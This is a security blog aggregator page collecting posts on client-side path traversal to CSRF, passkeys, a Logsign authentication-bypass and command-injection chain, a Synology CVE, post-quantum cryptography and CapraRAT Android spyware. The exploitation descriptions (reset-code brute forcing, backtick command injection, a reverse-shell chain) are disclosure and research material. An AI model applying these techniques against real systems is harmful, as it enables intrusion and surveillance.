Normal view

There are new articles available, click to refresh the page.
Yesterday — 3 July 2024Vulnerabily Research

What’s new in the MSRC Report Abuse Portal and API

The Microsoft Security Response Center (MSRC) has always been at the forefront of addressing cyber threats, privacy issues, and abuse arising from Microsoft Online Services. Building on our commitment, we have introduced several key updates to the Report Abuse Portal and API, which will significantly improve the way we handle and respond to abuse reports.
Before yesterdayVulnerabily Research

Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF

1 July 2024 at 22:00

Doyensec CSPT2CSRF

To provide users with a safer browsing experience, the IETF proposal named “Incrementally Better Cookies” set in motion a few important changes to address Cross-Site Request Forgery (CSRF) and other client-side issues. Soon after, Chrome and other major browsers implemented the recommended changes and introduced the SameSite attribute. SameSite helps mitigate CSRF, but does that mean CSRF is dead?

While auditing major web applications, we realized that Client Side Path-Traversal (CSPT) can be actually leveraged to resuscitate CSRF for the joy of all pentesters.

This blog post is a brief introduction to my research. The detailed findings, methodologies, and in-depth analysis are available in the whitepaper.

This research introduces the basics of Client-Side Path Traversal, presenting sources and sinks for Cross-Site Request Forgery. To demonstrate the impact and novelty of our discovery, we showcased vulnerabilities in major web messaging applications, including Mattermost and Rocket.Chat, among others.

Finally, we are releasing a Burp extension to help discover Client-Side Path-Traversal sources and sinks.

Thanks to the Mattermost and Rocket.Chat teams for their collaboration and authorization to share this.

Client-Side Path Traversal (CSPT)

Every security researcher should know what a path traversal is. This vulnerability gives an attacker the ability to use a payload like ../../../../ to read data outside the intended directory. Unlike server-side path traversal attacks, which read files from the server, client-side path traversal attacks focus on exploiting this weakness in order to make requests to unintended API endpoints.

Doyensec CSPT2CSRF

While this class of vulnerabilities is very popular on the server side, only a few occurrences of Client-Side Path Traversal have been widely publicized. The first reference we found was a bug reported by Philippe Harewood in the Facebook bug bounty program. Since then, we have only found a few references about Client-Side Path Traversal:

Client Side Path-Traversal has been overlooked for years. While considered by many as a low-impact vulnerability, it can be actually used to force an end user to execute unwanted actions on a web application.

Client-Side Path Traversal to Perform Cross-Site Request Forgery (CSPT2CSRF)

This research evolved from exploiting multiple Client-Side Path Traversal vulnerabilities during our web security engagements. However, we realized there was a lack of documentation and knowledge to understand the limits and potential impacts of using Client-Side Path Traversal to perform CSRF (CSPT2CSRF).

Source

While working on this research, we figured out that one common bias exists. Researchers may think that user input has to be in the front end. However, like with XSS, any user input can lead to CSPT (think DOM, Reflected, Stored):

  • URL fragment
  • URL Query
  • Path parameters
  • Data injected in the database

When evaluating a source, you should also consider if any action is needed to trigger the vulnerability or if it’s triggered when the page is loaded. Indeed, this complexity will impact the final severity of the vulnerability.

Sink

The CSPT will reroute a legitimate API request. Therefore, the attacker may not have control over the HTTP method, headers and body request.

All these restrictions are tied to a source. Indeed, the same front end may have different sources that perform different actions (e.g., GET/POST/PATCH/PUT/DELETE).

Each CSPT2CSRF needs to be described (source and sink) to identify the complexity and severity of the vulnerability.

As an attacker, we want to find all impactful sinks that share the same restrictions. This can be done with:

  • API documentation
  • Source code review
  • Semgrep rules
  • Burp Suite Bambda filter

CSPT2CSRF bambda

CSPT2CSRF with a GET Sink

Some scenarios of exploiting CSPT with a GET sink exist:

  • Using an open redirect to leak sensitive data associated with the source
  • Using an open redirect to load malicious data in order to trigger an XSS

However, open redirects are now hunted by many security researchers, and finding an XSS in a front end using a modern framework may be hard.

That said, during our research, even when stage-changing actions weren’t implemented directly with a GET sink, we were frequently able to exploit them via CSPT2CSRFs, without having the two previous prerequisites.

In fact it is often possible to chain a CSPT2CSRF having a GET sink with another state-changing CSPT2CSRF.

CSPT2CSRF get sink

1st primitive: GET CSPT2CSRF:

  • Source: id param in the query
  • Sink: GET request on the API

2nd primitive: POST CSPT2CSRF:

  • Source: id from the JSON data
  • Sink: POST request on the API

To chain these primitives, a GET sink gadget must be found, and the attacker must control the id of the returned JSON. Sometimes, it may be directly authorized by the back end, but the most common gadget we found was to abuse file upload/download features. Indeed, many applications exposed file upload features in the API. An attacker can upload JSON with a manipulated id and target this content to trigger the CSPT2CSRF with a state-changing action.

In the whitepaper, we explain this scenario with an example in Mattermost.

Sharing with the Community

This research was presented last week by Maxence Schmitt (@maxenceschmitt) at OWASP Global Appsec Lisbon 2024. The slides can be found here.

This blog post is just a glimpse of our extensive research. For a comprehensive understanding and detailed technical insights, please refer to the whitepaper.

Along with this whitepaper, we are releasing a BURP extension to find Client-Side Path Traversals.

CSPTBurpExtension

In Conclusion

We feel CSPT2CSRF is overlooked by many security researchers and unknown by most front-end developers. We hope this work will highlight this class of vulnerabilities and help both security researchers and defenders to secure modern applications.

More information

If you would like to learn more about our other research, check out our blog, follow us on X (@doyensec) or feel free to contact us at [email protected] for more information on how we can help your organization “Build with Security”.

The End of Passwords? Embrace the Future with Passkeys.

2 July 2024 at 07:00
Alexandre Baratin - The end of passwords? Embrace the future with Passkeys.

Yesterday, unexpectedly, my personal Google account suggested using Passkeys for login. This is amazing, as Passkeys is the game-changer for cyber security because it could imply the solution to one of the biggest headaches in cyber security: password use.

decorative image showing a hand holding a smartphone with a lock and a secret from which multiple paths are starting

The problem with passwords.

For decades, we have struggled with passwords as an authentication tool. They constitute a conceptually very weak solution for digital security. Using passwords is much more prone to abuse than most people realize. The intense use of digital applications caused users to juggle hundreds or thousands of passwords. Human behaviour led to poor practices: password re-use increased the risk of broad access breaches in case criminals stole a password. Increasing password length and complexity was circumvented by people keeping a paper list of passwords. The universal use of authentication to access a wide array of personal or business applications has created a situation where, to stay secure, a password manager and multi-factor authentication (MFA) are indispensable for critical services.
According to Google Cloud’s 2023 Threat Horizons Report, 86% of security breaches involve stolen credentials. IBM estimates the global average cost of a security breach was $4.45 million in 2023.
So how can we, in a structural way, eliminate the dangers associated with single password authentication per service and trust something more resilient, for both our private and personal digital life?

Why passkeys are a game-changer.

After its creation in 2013, the FIDO (Fast IDentity Online) alliance paved the way in 2018 for the introduction of FIDO2 keys. The size of USB sticks, they safely store a certificate, allowing authentication on any kind of device (laptops, smartphones, etc.) These are also known as YubiKeys (the most famous product leveraging this technology). These products have a good reputation and a reasonable adoption among users and institutions aware of the dangers of using passwords.
But while this key offers one of the best protections available on the market, the need to buy and manage a separate token is a showstopper for many individuals, although the daily use of passwords is ubiquitous. Passkeys offer a much better alternative.
So, why am I so enthusiastic about passkeys? Because they solve all the issues associated with passwords for both security professionals and everyday users.

Here’s how passkeys shine:

  • Enhanced Security: Passkeys are resistant to phishing and brute-force attacks. They are complex in structure and length and cannot be guessed.
  • Privacy: The private key never leaves the user’s device, reducing the risk of theft.
  • Convenience: No need to remember complex passwords.

What exactly are passkeys?

Do not confuse passkeys with passphrases. Passphrases, like passwords, are secrets you need to remember and enter manually. They are just longer passwords. Passkeys, however, are fundamentally different.
Passkeys rely on asymmetric cryptography, meaning they consist of:

  • A Private Key: Securely stored on the user’s device.
  • A Public Key: Shared with the server to verify the user’s identity.
  • A Challenge-Response Mechanism: Used to authenticate the user without exposing the private key.

Here is a simplified description of the logon process.

The passkeys logon process.
Source: Bitwarden.com.

The private key is the crucial element to secure, often stored in a password vault or, even better, in the TPM chip of your computer. Any modern smartphone or computer offers a way to securely store a private key, making it straightforward to use passkeys. As a fallback, password managers offer a reliable storage solution.

Built on open standards.

Passkeys are based on open standards developed by the FIDO Alliance. Security keys like YubiKey are also based on those standards. However, earlier versions required buying a physical key and were often complicated to initialize. For companies, the cost of buying and managing large numbers of physical keys was also a barrier.
Modern passkeys no longer require a token but can be installed as software. Together with the widespread adoption of MFA, they offer a truly passwordless solution, compatible with state-of-the-art devices, and therefore easy to obtain and install.

For both personal and corporate use.

Tech giants like Google, Microsoft, Apple, Amazon, and Meta are now adopting passkeys. For users, logging in will be as simple as validating the connection on their phone, using a PIN or biometric authentication.
For companies, passkeys and FIDO standards represent an opportunity to enhance security by reducing risks associated with traditional password use and implementing a passwordless strategy. Passkeys are easy to use, easy to deploy, cost-effective, and robust. All major cloud vendors provide guidance on implementing passkeys or any other passwordless based on FIDO standards, and Microsoft is providing guidance on Active Directory implementation.
One more thing remains, where to keep your secrets?
When you use passkeys, keeping your certificates safe is crucial. You might be wondering where to put that secret, right? After all, you don’t want anyone else getting their hands on your private key. The good thing is that you have plenty of options! The not so good thing is that they all have their pros and cons. As always, you will have to balance security and convenience.

The table below shows your alternatives for storing your passkeys:

Store your passkeys in:PROSCONS
TPM chip of your computerHigh security, protection against hardware and software attacks with the integrated TPM ChipLess flexible for multi-device access
SmartphoneConvenient and mobile, dedicated security modules (Apple Secure Enclave or Android Trust Zone)Issues if lost or stolen without backups
IAM (Identity and Access Management) Solutions (Google Cloud IAM, Azure AD, AWS IAM)Centralized management, advanced security, multi-factor supportComplex setup and management, dependency on cloud services
Password Managers (1Password, Dashlane, Bitwarden, … )Flexibility, multi-device access, robust encryptionDepends on the security of the manager, risk of compromise
Hardware Security Keys (YubiKey, Google Titan)Maximum security, portable, compatible with many servicesNeed to carry the key, risk of loss or theft
Alternatives to store your passkeys

A natural choice for a company is to leverage an existing IAM solution. For instance, when using Microsoft EntraID, the built-in features enable the technology. For Apple users, there is a similar mechanism that works on both IOS and MacOS.
I do not use YubiKeys yet, but they are the best option to store my passkeys. Currently, I keep my passkeys in my favourite password manager, and I am hoping to change all my passwords soon!

The Future Norm ?

Passkeys will become the new norm in a few years. Users will realize that passkeys simplify their lives, and companies and users alike will appreciate the reduced risk of breaches from phishing or brute-force attacks. However, building user trust in passkeys remains a challenge, like the adoption of password managers. Employers and providers of digital services should find effective ways to explain the importance and benefits of adopting passkeys just as they previously advocated for the use of strong, complex passwords.

Looking ahead, passkeys will be particularly valuable in a quantum computing future. Although current passkeys do not yet utilize quantum-resistant cryptography, they offer a flexible and scalable solution. Updating and replacing passkeys will be significantly easier compared to traditional passwords (finally, no more trying to generate and remember new secret password). Personally, I am adopting passkeys for every service that offers them as an option. At NVISO, we are encouraging customers to include a password-less strategy into their zero-trust journey.

What about you? Is it the first time you are hearing about passkeys? Are you using them personally or have you seen companies successfully deploying them? Feel free to share your thoughts and questions in the comments below!

picture of Alexandre Baratin

Alexandre Baratin

Alexandre Baratin is a Cyber Security Consultant active in the Cyber Security and Architecture team at NVISO. With a comprehensive background in IT and Cyber Security, he assists companies on their Cyber Security journey by enhancing security awareness, developing or refining GRC processes, and managing the security program through NVISO’s CISO as a Service offering.

Alexandre possesses the most recognized certifications in IT, project management, cybersecurity, and cloud computing.

Getting Unauthenticated Remote Code Execution on the Logsign Unified SecOps Platform

1 July 2024 at 16:56

Earlier this year, the Trend Micro Zero Day Initiative (ZDI) acquired several vulnerabilities in the Logsign Unified SecOps Platform. These were all reported to the ZDI by Mehmet INCE (@mdisec) from PRODAFT.com. According to Logsign’s website:

Logsign provides comprehensive visibility and control of your data lake by allowing security analysts to collect and store unlimited data, investigate and detect threats, and respond automatically.

Logsign offers a single, unified whole security operation platform to alleviate the challenges associated with deploying multiple cybersecurity tools while reducing the costs and complexities that come with managing them individually.

Logsign runs as a Python-based web server. Users have the ability to interact with the web server through a variety of APIs. This blog looks at two separate vulnerabilities that can be combined to achieve remote, unauthenticated code execution on the web server via HTTP requests.

CVE-2024-5716 – Authentication Bypass

This vulnerability allows remote attackers to bypass authentication on affected installations of Logsign Unified SecOps Platform. The specific flaw exists within the password reset mechanism. The issue results from the lack of restrictions on excessive password reset attempts. An attacker can leverage this vulnerability to reset a user's password and bypass authentication on the system.

Anyone who can access TCP port 443 on the web server can request a password reset for a username. Once requested, the server sends a reset_code, which is a 6-digit number, to the email address associated with the username. Under normal operations, the user then uses the reset_code to reset their password.

The vulnerability is due to there being no rate limiting for requesting a reset_code. Since there is a default user named “admin”, an attacker can send multiple requests to reset the admin’s password until they brute force the correct reset_code. The attacker can then reset the admin’s password and log in as an administrator.

This vulnerability is located in /opt/logsign-api/api.py:

If we send a POST request to https://LOGSIGNIP/api/settings/forgotpassword, the server will use this function to handle it.

       -- On line [1], it gets the username parameter from the POST request.
       -- On line [2], it checks if this user is not from_ldap, which is the default configuration. It then sets reset_code to random_int(6).

reset_code is set to a randomly-selected string of 6 decimal digits. Finally, the server stores the username and reset_code pair, and sends reset_code to the user's email.

If we send a POST request to https://LOGSIGN_IP/api/settings/verify_reset_code, the server will use the above function to handle it. If the username and reset_code are correct, the server responds with verification_code. Once in possession of this verification_code, the attacker will be permitted to reset the password.

On the line marked [1] in the code snippet above, we find a 3-minute time check. However, this is merely a check against the expiry time of the reset_code and not a rate-limiter. An attacker can make numerous attempts at guessing the reset_code by calling verify_reset_code as many times as possible within the 3-minute window. If the attacker fails within these 3 minutes, they can send another request to https://LOGSIGNIP/api/settings/forgotpassword and repeat the brute-force attack until they succeed. Since there are only 1 million possible values for reset_code, it is feasible to enumerate within the allotted time a significant proportion of all possible codes.

Once the attacker has guessed the reset_code and successfully obtained the verification_code, the attacker can call the reset_user_password endpoint, passing the verification_code:

When the server receives the correct username and verification_code, it allows the attacker to reset the user’s password.

The Exploit

The exploit is designed to use as many threads as possible to guess the reset_code.

We tested this with Logsign installed on a VMware virtual machine with 8 CPUs and 16GB of memory. Our attacker machine was capable of running 20 threads, which equated to roughly 15,000 attempts within 3 minutes.

CVE-2024-5717 – Post-Auth Command Injection

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Logsign Unified SecOps Platform. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.

The specific flaw results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.

This vulnerability resides in /opt/logsign-api/settings_api.py:

If a user sends a POST request to https://LOGSIGNIP/api/settings/demomode, the server will use this function to handle the request.

      -- On line [1], we see that the user needs to be authenticated to make this request. Hence this a post-authentication vulnerability.

The POST data for this request is as follows:

      -- On line [2], the server takes value of the list parameter from the POST data and passes it to escapeshellarg. It then takes the result of escapeshellarg, encloses it in single-quotes, and adds it as a parameter to a shell command using string concatenation.

To a PHP programmer, it seems that the escapeshellarg() function sanitizes the list string and makes this code secure. Unfortunately, this is Python, and escapeshellarg() is not a built-in function in Python. (Note that Python ships with its own mechanisms for sanitizing shell parameters.) Instead, what appears here as escapeshellarg()is a custom implementation that can be trivially bypassed.

The escapeshellarg() function is defined in /opt/logsign-commons/python/logsign/commons/helpers.pyc. Using python_uncompyle6 to decompile helpers.pyc, we obtain the following Python script:

escapeshellarg() only escapes single quote characters! Therefore, we can use any command injection technique as long as it doesn’t rely on single quotes.

This command injection works only once. If you want to subsequently execute another command, you need to first issue a request changing enable back to false. Then you can send the first request again to perform another command injection.

The Exploit

The exploit for this vulnerability is relatively simple. We will use backticks as a means of shell command injection, since this does not require single quotes. We can execute any shell command we wish, provided that our command does not itself contain any single quotes.

Combining CVE-2024-5716 and CVE-2024-5717

While the command injection vulnerability is post-auth, we can combine it with the authentication bypass to make it a pre-auth code execution. We use CVE-2024-5716 to reset the admin’s password, then log in with the admin’s credential and execute the command injection.

In this exploit, we use the command injection to get a reverse shell. We use a Python reverse shell, since Logsign installs Python by default.

Conclusion

Logsign patched these and other vulnerabilities with version 6.4.8. Combining these bugs shows why even post-authentication bugs are worth fixing. When paired with an authentication bypass, a post-auth bug becomes pre-auth relatively quickly. We have seen situations like this at Pwn2Own competitions, in which a vendor believed that the addition of authentication was sufficient for defense.

The authentication bypass vulnerability shown here is a textbook example of the problems that can arise when implementing your own authentication mechanism. (See Web Application Hacker’s Handbook, Chapter 6, Forgotten Password Functionality, Hack Step 5.)  The presence of this rudimentary vulnerability should prompt the vendor to perform a full audit of their software.

I hope you enjoyed this blog and remember not to be daunted by authentication. Until my next post, you can follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

CVE-2024-39348

1 July 2024 at 10:57

Download of code without integrity check vulnerability in AirPrint functionality in Synology Router Manager (SRM) before 1.2.5-8227-11 and 1.3.1-9346-8 allows man-in-the-middle attackers to execute arbitrary code via unspecified vectors.
The vulnerability allows man-in-the-middle attackers to execute arbitrary code or access intranet resources via a susceptible version of Synology Router Manager (SRM).

Quantum is unimportant to post-quantum

1 July 2024 at 13:00

By Opal Wright

You might be hearing a lot about post-quantum (PQ) cryptography lately, and it’s easy to wonder why it’s such a big deal when nobody has actually seen a quantum computer. But even if a quantum computer is never built, new PQ standards are safer, more resilient, and more flexible than their classical counterparts.

Quantum computers are a big deal; just ask around, and you’ll get plenty of opinions. Maybe quantum computers are on the verge of destroying public-key cryptography as we know it. Or maybe cryptographically significant quantum computers are an impossible pipe dream. Maybe the end of public-key cryptography isn’t now, but it’s only two decades away. Or maybe we have another 50 or 60 years because useful quantum computers have been two decades away for three decades, and we don’t expect that to change soon.

These opinions and predictions on quantum computers lead to many different viewpoints on post-quantum cryptography as well. Maybe we need to transition to post-quantum crypto right now, as quickly as we can. Maybe post-quantum crypto is a pipe dream because somebody will find a way to use quantum computers to break new algorithms, too. Maybe a major world government already has a quantum computer but is keeping it classified.

The fact of the matter is, it’s hard to know when a cryptographically significant quantum computer will exist until we see one. We can guess, we can try to extrapolate based on the limited data we have so far, and we can hope for one outcome or the other. But we can’t know with certainty.

That’s okay, though, because quantum resistance isn’t the main benefit of post-quantum crypto.

Current research and standards work will result in safer, more resilient cryptographic algorithms based on a diverse set of cryptographic problems. These algorithms benefit from the practical lessons of the last 40 years and provide use-case flexibility. Doomsayers and quantum skeptics alike should celebrate.

All in one basket

People who are worried about quantum computers often focus on one point, and they’re absolutely right about it: almost all public-key cryptography in wide use right now could be broken with just a few uncertain-but-possible advances in quantum computing.

Loosely speaking, the most commonly-used public-key algorithms are based on three problems: factoring (RSA), finite field discrete logarithms (Diffie-Hellman), and elliptic curve discrete logarithms (ECDH and ECDSA). These are all special instances of a more general computational problem called the hidden subgroup problem. And quantum computers are good at solving the hidden subgroup problem. They’re really good at it. So good that, if somebody builds a quantum computer of what seems like a reasonable size to many researchers, they can do all manner of nasty things. They can read encrypted messages. They can impersonate trusted organizations online. They can even use it to build tools for breaking some forms of encryption without quantum computers.

But even if quantum computing never becomes powerful enough to break current public keys, the fear of the quantum doomsayers is based on a completely valid observation: the internet has put nearly all of its cryptographic eggs into the single basket of the hidden subgroup problem. If somebody can efficiently solve the hidden subgroup problem, whether it’s with quantum computers or classical computers, they will be able to break the vast majority of public-key cryptography used on the internet.

What often gets overlooked is that, for the last 40 years, the hidden subgroup basket has consistently proven less safe than we expected.

Advances in factoring and discrete logs

In the 1987 talk “From Crossbows to Cryptography: Techno-Thwarting the State,” Chuck Hammill discussed RSA keys with 200 digits, or about 664 bits, saying that the most powerful supercomputers on earth wouldn’t be able to factor such a number in 100 years. The Unix edition of PGP 1.0 supported 992-bit RSA keys as its highest security level, saying the key size was “military grade.”

Nowadays, formulas provided by the National Institute of Standards and Technology (NIST) suggest that a 664-bit key offers only about 65 bits of security and is firmly within the reach of motivated academic researchers. A 992-bit key offers only about 78 bits of security and is speculated to be within reach of intelligence agencies.

(The smallest key size supported in PGP 1.0, 288 bits, can be broken in about 10 minutes on a modern desktop computer using readily available software like msieve. “Commercial grade” keys were 512 bits, which can be factored using AWS in less than a day for under $100.)

Ever-increasing key sizes

In response to advances in factoring and discrete logarithm algorithms over the years, we’ve responded by doing the only thing we really knew how to do: increasing key sizes. Typical RSA key sizes these days are 2048 to 4096 bits, roughly three to six times longer than Chuck Hammill suggested, and two to four times the length of what an early version of PGP called a “military grade” RSA key. The National Security Agency requires RSA keys no shorter than 3072 bits for classified data. The NIST formulas suggest that keys would need to be 15,360 bits long in order to match the security of a 256-bit AES key.

Finite field discrete logarithm key sizes have largely tracked RSA key sizes over the years. This is because the best algorithm for solving both problems is the same: index calculus using the general number field sieve (GNFS). There are some differences at the edges, but most of the hard work is the same. It’s worth pointing out that finite field discrete log cryptosystems have an additional downside: computing one discrete log in a finite field costs about the same as computing a lot of discrete logs.

Elliptic curves, which have become more popular over the last 15 years or so, have not seen the sort of changes in key size that happened with factoring and discrete log systems. Index calculus doesn’t translate well to elliptic curves, thank goodness, but elliptic curve discrete logarithms are an open area of research.

Implementation dangers

On top of the lack of problem diversity, another concern is that current algorithms are finicky and subject to subtle implementation failures.

Look, we’re Trail of Bits. We’re kinda famous for saying “fuck RSA,” and we say it mainly because RSA is full of landmines. Finite field Diffie-Hellman has subtle problems with parameter selection and weak subgroup attacks. Elliptic curve cryptosystems are subject to off-curve attacks, weak subgroup attacks, and attacks related to bad parameter selection.

Worse yet, every one of these algorithms requires careful attention to avoid timing side channel attacks!

Taken together, these pitfalls and subtle failure modes turn current public-key primitives into an absolute minefield for developers. It’s not uncommon for cryptography libraries to refer to their low-level functionality as “hazmat.” This is all before you move into higher-level protocols!

Many implementation concerns are at least partially mitigated through the use of good standards. Curve25519, for instance, was specifically designed for fast, constant-time implementations, as well as security against off-curve and weak subgroup attacks. Most finite field Diffie-Hellman key exchanges used for web traffic are done using a small number of standardized parameter sets that are designed to mitigate weak subgroup attacks. The ever-growing menagerie of known RSA attacks related to encryption and signing can (usually) be mitigated by using well-tested and audited RSA libraries that implement the latest standards.

Good standards have helped immensely, but they really just paper over some deeply embedded properties of these cryptosystems that make them difficult to use and dangerous to get wrong. Still, despite the consequences of errors and the availability of high-quality open-source libraries, Trail of Bits regularly finds dangerously flawed implementations of these algorithms in our code reviews.

What post-quantum crypto provides

So why is post-quantum crypto so much better? It’s instructive to look at the ongoing NIST post-quantum crypto standardization effort.

Diversity of problems

First of all, upcoming NIST standards are based on multiple mathematical problems:

  • CRYSTALS-KYBER, CRYSTALS-DILITHIUM, and Falcon are based on lattice problems: short integer solutions (SIS) and learning with errors (LWE) over various rings.
  • SPHINCS+ is based on the difficulty of second-preimage attacks for the SHA-256 and SHA-3 hash functions.

Additionally, NIST is attempting to standardize one or more additional signature algorithms, possibly based on different problems. Submissions include signature algorithms based on problems related to elliptic curve isogenies, error correcting codes, and multivariate quadratics.

By the time the next phase of standardization is over, we can expect to have algorithms based on at least three or four different mathematical problems. If one of the selected problems were to fall to advances in quantum or classical algorithms, there are readily-available replacements that are highly unlikely to be affected by attacks on the fallen cryptosystems.

Modern design

The post-quantum proposals we see today have been developed with the advantage of hindsight. Modern cryptosystem designers have seen the myriad ways in which current public-key cryptography fails in practice, and those lessons are being integrated into the fabric of the resulting designs.

Here are some examples:

  • Many post-quantum algorithms are designed to make constant-time implementations easy, reducing the risk of timing attacks.
  • Many algorithms reduce reliance on random number generators (RNGs) by extending nonce values with deterministic functions like SHAKE, preventing reliance on insecure RNGs.
  • Random sampling techniques for non-uniform distributions in the NIST finalists are fully specified and have been analyzed as part of the standardization effort, reducing the risk of attacks that rely on biased sampling.
  • Many post-quantum algorithms are fully deterministic in their input (meaning that encrypting or signing the same values with the same nonces will always produce the same results), reducing nonce reuse issues and the risk of information leakage if values are reused.
  • Many algorithms are designed to allow quick and easy generation of new keys, making it easier to provide forward secrecy.
  • Rather than inviting developers to dream up their own parameters, every serious proposal for a post-quantum cryptosystem lists a small set of secure parameterizations.

These are intentional, carefully-made decisions. Each is based on real-world failures that have shown up over the last 40 years or so. In cryptography, we often refer to these failure scenarios as “footguns” because they make it easy to shoot yourself in the foot; the newer designs go out of their way to make it difficult.

Use-case flexibility

With new algorithms come new trade-offs, and there are plenty to be found in the post-quantum standards. Hash-based signatures can run to 50 kilobytes, but the public keys are tiny. Code-based systems like McEliece have small ciphertexts, and decrypt quickly—but the public keys can be hundreds of kilobytes.

This variety of different trade-offs gives developers a lot of flexibility. For an embedded device where speed and bandwidth are important but ROM space is cheap, McEliece might be a great option for key establishment. For server farms where processor time is cheap but saving a few bytes of network activity on each connection can add up to real savings, NTRUSign might be a good option for signatures. Some algorithms even provide multiple parameter sets to address different needs: SPHINCS+ includes parameter sets for “fast” signatures and “small” signatures at the same security level.

The downside of post-quantum: Uncertainty

Of course, one big concern is that everybody is trying to standardize cryptosystems that are relatively young. What if the industry (or NIST) picks something that’s not secure? What if they pick something that will break tomorrow?

The idea can even feel frighteningly plausible. RAINBOW made it to the third round of the NIST PQC standardization effort before it was broken. SIKE made it to the (unplanned) fourth round before it was broken.

Some folks worry that a new standard could suffer the same fate as RAINBOW and SIKE, but not until after it has been widely adopted in industry.

But here’s a scary fact: we already run that risk. From a mathematical standpoint, there’s no proof that RSA moduli can’t be factored easily. There’s no proof that breaking RSA, as it’s used today, is equivalent to factoring (the opposite is true, in fact). It’s completely possible that somebody could publish an algorithm tomorrow that totally destroys Diffie-Hellman key exchanges. Somebody could publish a clever paper next month that shows how to recover private ECDSA keys.

An even scarier fact? If you squint a little, you’ll see that big breaks have already happened with factoring and finite field discrete logs. As mentioned above, advances with the GNFS have been pushing up RSA and Diffie-Hellman key sizes for over two decades now. Keys that would have been considered fine in 1994 are considered laughable in 2024. RSA and Diffie-Hellman from the old cipherpunk days are already broken. You just didn’t notice they’re broken because it took 30 years to happen, with keys getting bigger all the while.

I don’t mean to sound glib. Serious researchers have put in a lot of effort over the last few years to study new post-quantum systems. And, sure, it’s possible they missed something. But if you’re really worried about the possibility that somebody will find a way to break SPHINCS or McEliece or CRYSTALS-KYBER or FALCON, you can keep using current algorithms for a while. Or you could switch to a hybrid cryptography system, which marries post-quantum and pre-quantum methods together in a way that should stay secure as long as both are not broken.

Summing up

Fear of quantum computers may or may not be overblown. We just don’t know yet. But the effect of post-quantum crypto research and standardization efforts is that we’ve taken a ton of eggs out of one basket and we’re building a much more diverse and modern set of baskets instead.

Post-quantum standards will eventually replace older, more finicky algorithms with algorithms that don’t fall apart over the tiniest of subtleties. Several common sources of implementation error will be eliminated. Developers will be able to select algorithms to fit a broad range of use cases. The variety of new mathematical bases provides a “backup plan” if a mathematical breakthrough renders one of the algorithms insecure. Post quantum algorithms aren’t a panacea, but they certainly treat a lot of the headaches we see at Trail of Bits.

Forget quantum computers, and look at post-quantum crypto research and standardization for what it is: a diversification and modernization effort.

CapraTube Remix | Transparent Tribe’s Android Spyware Targeting Gamers, Weapons Enthusiasts

1 July 2024 at 12:55

Executive Summary

  • SentinelLabs has identified four new CapraRAT APKs associated with suspected Pakistan state-aligned actor Transparent Tribe.
  • These APKs continue the group’s trend of embedding spyware into curated video browsing applications, with a new expansion targeting mobile gamers, weapons enthusiasts, and TikTok fans.
  • The overall functionality remains the same, with the underlying code updated to better suit modern Android devices.

Overview

Transparent Tribe (aka APT 36, Operation C-Major) has been active since at least 2016 with attacks against Indian government and military personnel. The group relies heavily on social engineering attacks to deliver a variety of Windows and Android spyware, including spear-phishing and watering hole attacks.

In September 2023, SentinelLabs outlined the CapraTube campaign, which used weaponized Android applications (APK) designed to mimic YouTube, often in a suspected dating context due to the nature of the videos served. The activity highlighted in this report shows the continuation of this technique with updates to the social engineering pretexts as well as efforts to maximize the spyware’s compatibility with older versions of the Android operating system while expanding the attack surface to include modern versions of Android.

New CapraRAT APKs

SHA-1 c307f523a1d1aa928fe3db2c6c3ede6902f1084b
App Name Crazy Game signed.apk
Package Name com.maeps.crygms.tktols
SHA-1 dba9f88ba548cebfa389972cddf2bec55b71168b
App Name Sexy Videos signed.apk
Package Name com.nobra.crygms.tktols
SHA-1 28bc3b3d8878be4267ee08f20b7816a6ba23623e
App Name TikTok signed.apk
Package Name com.maeps.vdosa.tktols
SHA-1 fff24e9f11651e0bdbee7c5cd1034269f40fc424
App Name Weapons signed.apk
Package Name com.maeps.vdosa.tktols
New CapraRAT app logos
New CapraRAT app logos

The new versions of CapraRAT each use WebView to launch a URL to either YouTube or a mobile gaming site, CrazyGames[.]com. There is no indication that an app with the same name, Crazy Games, is weaponized as it does not require several key CapraRAT permissions, such as sending SMS, making calls, accessing contacts, or recording audio and video. The URL query in the CapraRAT code is obfuscated as htUUtps://www.youUUtube.com/resulUUts?seUUarch_quUUery=TiUUk+ToUUks, which is cleaned to remove occurrences of UU, resulting in https[:]//www.youtube[.]com/results?search_query=Tik+Toks.

URL deobfuscation and loading performed by CapraRAT’s load_web method
URL deobfuscation and loading performed by CapraRAT’s load_web method
Decompiled view of load_web method
Decompiled view of load_web method

The previous CapraTube campaign had one APK called Piya Sharma that was likely used in a romance-themed social engineering pretext. The new campaign continues that trend with the Sexy Videos app. While two of the previously reported apps launched only YouTube with no query, the YouTube apps from this campaign are each preloaded with a query related to the application’s theme. The TikTok app launches YouTube with the query “Tik Toks,” and the Weapons app launches the Forgotten Weapons YouTube channel, which reviews a variety of classic arms and has 2.7 Million subscribers.

TikTok and Weapons-themed CapraRAT YouTube WebView
TikTok and Weapons-themed CapraRAT YouTube WebView

The Crazy Games app launches WebView to load CrazyGames[.]com, a site containing in-browser mini games. This particularly resource-intensive site did not work well on older versions of Android during our testing.

Crazy Games CapraRAT WebView
Crazy Games CapraRAT WebView

When the app first launches, the user is prompted to grant several risky permissions, including:

  • Access GPS location
  • Manage network state
  • Read and send SMS
  • Read contacts
  • Record audio and screen, take screenshots
  • Storage read and write access
  • Use camera
  • View call history and make calls

In contrast with the previous CapraRAT campaign, the following Android permissions are no longer requested or used:

  • READ_INSTALL_SESSIONS
  • GET_ACCOUNTS
  • AUTHENTICATE_ACCOUNTS
  • REQUEST_INSTALL_PACKAGES

The reduction in permissions suggests the app developers are focused on making CapraRAT a surveillance tool more than a fully featured backdoor.

App Compatibility

The most significant changes between this campaign and the September 2023 campaign are to app compatibility. The newest CapraRAT APKs we identified now contain references to Android’s Oreo version (Android 8.0), which was released in 2017. Previous versions relied on the device running Lollipop (Android 5.1), which was released in 2015 and less likely to be compatible with modern Android devices.

We tested the APKs from this campaign and the September 2023 campaign on an Android device running Android Tiramisu aka Android 13 (2022) and Android 14 (2023). The new campaign’s apps ran smoothly on this modern version of Android. The September 2023 campaign apps prompted a compatibility warning dialog, which could raise suspicion among victims that the app is abnormal. When running on the newest released version of Android 14, the September 2023 campaign’s Piya Sharma app fails to install. Each of the newer versions ran successfully.

